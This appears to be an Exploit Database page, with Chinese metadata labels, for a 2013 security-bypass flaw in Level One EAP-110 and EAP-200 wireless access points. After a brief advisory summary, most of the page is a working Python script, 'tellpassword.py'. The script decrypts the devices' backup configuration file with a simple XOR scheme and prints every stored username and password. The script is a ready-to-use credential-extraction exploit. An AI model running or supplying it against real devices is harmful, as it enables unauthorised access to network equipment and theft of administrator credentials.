Level One Enterprise Access Point (Multiple Devices) – ‘backupCfg.cgi’ Security Bypass

• Exploit Database
• 128 阅读

• 作者： Richard Weinberger
  日期： 2013-10-15
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/38804/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55

  source: https://www.securityfocus.com/bid/63168/info   Multiple Level One Enterprise Access Point devices are prone to a security bypass vulnerability.   Successfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks.   Level One EAP-110 and EAP-200 running firmware 2.00.03 build 1.50-1.5045 are vulnerable; other versions may also be affected.   # tellpassword.py # # Extracts user accounts from Level1 (ip4net) # EAP-200 (and other) Wifi Access Points # # (c) 2013 sigma star gmbh   import sys, re   attribRegex = re.compile(r"(\w+)=\"([^\"]*)\"")   if (len(sys.argv) != 2): print "USAGE: %s config-backup.conf" % sys.argv[0] exit(1)   # decrypt config encrypted = open(sys.argv[1], &apos;rb&apos;) plain = open(&apos;plain.xml&apos;, &apos;w&apos;) cntr = 0 encrypted.seek(128) byte = encrypted.read(1) print "Decrypting config file into plain.xml" while byte: plainOrd = ((ord(byte) ^ 0xff) + cntr) % 0x80 plain.write(chr(plainOrd)) cntr = (cntr + 1) % 0x40 byte = encrypted.read(1) encrypted.close() plain.close()   # find user accounts print "Parsing accounts..." plain = open(&apos;plain.xml&apos;, &apos;r&apos;) for line in plain: if "<user" in line: user = None password = None for match in attribRegex.finditer(line): attrib = match.group(1) if attrib == "name": user = match.group(2) elif attrib == "password": password = match.group(2) if len(password) > 0: print " - %s: %s" % (user, password) plain.close()